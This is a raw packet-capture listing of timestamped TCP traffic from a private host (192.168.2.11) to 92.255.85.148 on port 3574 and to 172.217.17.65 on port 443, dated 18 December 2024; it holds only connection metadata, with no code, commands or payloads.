                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.517292023 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.518318892 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.518419981 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.518428087 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.519320965 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.519407988 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.519459009 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.520382881 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.520484924 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.520484924 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.521472931 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.521652937 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.521660089 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.522412062 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.522552967 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.522562981 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.523521900 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.523575068 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.523638010 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.524557114 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.524607897 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.524657011 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.525645018 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.525727034 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.525809050 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.526710987 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.526803017 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.526835918 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.527817965 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.527858019 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.527904034 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.528953075 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.529016972 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.529128075 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.529880047 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.529987097 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.529993057 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.530913115 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.531018972 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.531095982 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.532010078 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.532062054 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.532130003 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.533072948 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.533170938 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.533621073 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.534133911 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.534260988 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.534277916 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.535269022 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.535346985 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.535420895 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.536257029 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.536313057 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.536364079 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.537525892 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.537585020 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.537728071 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.538388968 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.538467884 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.538677931 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.539557934 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.539675951 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.539700985 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.540613890 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.540673971 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.540699959 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.541551113 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.541611910 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.541877985 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.542573929 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.542732954 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.730101109 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.730962038 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.731054068 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.731110096 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.732024908 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.732093096 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.732187033 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.733093023 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.733181000 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.733243942 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.734142065 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.734211922 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.734257936 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.735245943 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.735285044 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.735371113 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.736267090 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.736383915 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.736464024 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.737309933 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.737384081 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.737430096 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.738385916 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.738508940 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.738574028 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.739440918 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.739548922 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.739619970 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.740498066 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.740628958 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.740673065 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.741627932 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.741734028 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.741802931 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.742629051 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.742820978 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.742870092 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.743689060 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.743788004 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.743830919 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.744724035 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.744848967 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.744956017 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.745807886 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.745906115 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.745995998 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.746850967 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.746994019 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.747284889 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.747951984 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.748081923 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.748157024 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.749028921 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.749090910 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.749151945 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.750020981 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.750117064 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.750166893 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.751096010 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.751213074 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.751334906 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.752146006 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.807501078 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.889131069 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.889156103 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.889348030 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.889400005 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.889468908 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.889539003 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.890455008 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.890542984 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.890602112 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.891556978 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.891683102 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.891733885 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.892607927 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.318710089 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.321878910 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.441379070 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.441472054 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.561682940 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.593167067 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.593204975 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.593410969 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.593523979 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.593539953 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.929241896 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.929264069 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.929534912 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.951853991 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.951960087 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.952059031 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.952171087 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.071589947 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.071608067 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.071620941 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.071640015 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.071705103 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.071849108 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.071882010 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.071902990 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.071930885 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072060108 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072071075 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072115898 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072134018 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072175026 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072210073 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072218895 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072249889 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072269917 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072295904 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072338104 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.072386026 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191399097 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191416025 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191468954 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191481113 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191534996 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191607952 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191689968 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191699028 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191725969 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191751957 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191771030 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191792965 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191793919 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191844940 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191885948 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191925049 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.191929102 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.192390919 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.312262058 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.312319040 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.312576056 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.312622070 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.312920094 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.313066959 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.313101053 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.313137054 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.313189983 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.313255072 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.313468933 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.313519001 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.808621883 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.826176882 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.826232910 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.826298952 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.945708036 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.945784092 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.945875883 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:39.945908070 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.436058998 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.449641943 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.449776888 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.449798107 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.463490009 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.463603020 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.463639975 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.477153063 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.477246046 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.477267981 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.489978075 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.490123987 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.490147114 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.502125025 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.502229929 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.502260923 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.514132023 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.514245987 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.514275074 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.526309967 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.526532888 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.526556969 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.560218096 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.560309887 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.560342073 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.562397957 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.562566996 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.562587976 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.571610928 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.571718931 CET49740443192.168.2.11172.217.17.65
